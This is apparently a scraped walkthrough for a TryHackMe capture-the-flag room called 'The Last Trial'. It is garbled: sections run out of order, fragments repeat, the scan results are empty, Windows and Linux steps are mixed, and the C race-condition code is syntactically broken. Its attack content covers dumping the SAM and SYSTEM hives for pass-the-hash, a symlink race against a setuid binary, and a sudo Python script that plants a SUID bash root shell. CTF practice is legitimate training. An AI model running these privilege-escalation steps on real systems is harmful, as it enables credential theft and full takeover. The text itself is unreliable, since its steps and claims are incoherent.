The Last Trial Tryhackme Verified

  • If a login exists, check for password reuse or leaks in accessible files (e.g., config.php, .env).

    • Run winpeas.exe via proxychains. The verified vulnerability is a CVE-2021-36934 (HiveNightmare) because the room creator deliberately forgot to fix the SAM file permissions.

    Dump SAM:

    reg save hklm\sam sam.save
reg save hklm\system system.save

    Download to attacker, use secretsdump.py to get Administrator hash. Pass-the-hash to gain SYSTEM. the last trial tryhackme verified

    Save as race.c:

    #include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

    int main() 
while(1) 
symlink("/etc/passwd", "/root/verified.flag");
unlink("/root/verified.flag");
return 0;

    Compile on target: gcc race.c -o race and run in background. Simultaneously, repeatedly execute /usr/bin/verify_access. Within seconds, you get a root shell.

    This is the verified privilege escalation. No other method works because the binary ignores standard sudo exploits.

  • The final flag is a canary token (verification string) you must submit on the TryHackMe platform.

    • Create a new file called run.py with the following contents: If a login exists, check for password reuse

    import os
os.system('cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p')

    Then, execute the remote_run.py script:

    sudo /usr/bin/python3 /opt/remote_run.py run.py

    As with any CTF, we start by enumerating the target machine to identify open ports and services.

    Nmap Scan:

    nmap -sV -sC -oN nmap.txt <MACHINE_IP>

    Results:

    We have two ports open. SSH usually requires credentials we don't have yet, so we focus our initial efforts on the web server running on port 80.